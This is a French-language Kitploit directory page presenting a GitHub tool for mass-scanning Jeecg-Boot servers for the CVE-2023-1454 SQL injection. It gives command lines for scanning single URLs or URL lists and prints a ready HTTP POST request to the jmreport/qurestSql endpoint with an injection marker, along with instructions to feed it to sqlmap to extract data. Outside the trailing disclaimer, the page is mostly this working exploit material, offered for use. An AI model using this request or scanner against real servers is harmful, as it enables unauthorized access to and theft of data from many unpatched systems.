Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-1454 — CVE-2023-1454,Injection SQL frontale de Jeecg-Boot,Détection en masse de CVE-2023-1454 | Kitploit
Outils/GitHubGitHub/padbergpete47/cve-2023-1454
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubpadbergpete47/cve-2023-1454

CVE-2023-1454

CVE-2023-1454,Injection SQL frontale de Jeecg-Boot,Détection en masse de CVE-2023-1454

Voir le dépôt
82il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-1454

jmreport/qurestSql POC de scan de masse pour injection SQL non autorisée Jeecg-Boot est une plateforme de développement rapide basée sur Spring Boot et Jeecg-Boot-Plus. La dernière version jeecg-boot 3.5.0 a révélé plusieurs vulnérabilités d'injection SQL.

Description

Lien de l'outil original

L'outil original avait un taux de faux positifs élevé. J'ai modifié les conditions de détection et optimisé le code.

Utilisation de l'outil

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 Test d'une seule URL

python3 CVE-2023-1454-scan.py -f url.txt Détection en masse

Après l'analyse, un fichier vuln.txt contenant les URL vulnérables sera généré dans le répertoire courant.

POC :

EXP :

Enregistrez le paquet en tant que fichier txt et utilisez sqlmap pour obtenir les données.

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Avertissement

Toute conséquence ou perte directe ou indirecte résultant de la diffusion ou de l'utilisation des informations fournies dans ce document relève de la responsabilité de l'utilisateur. L'auteur décline toute responsabilité.

Télécharger l’outil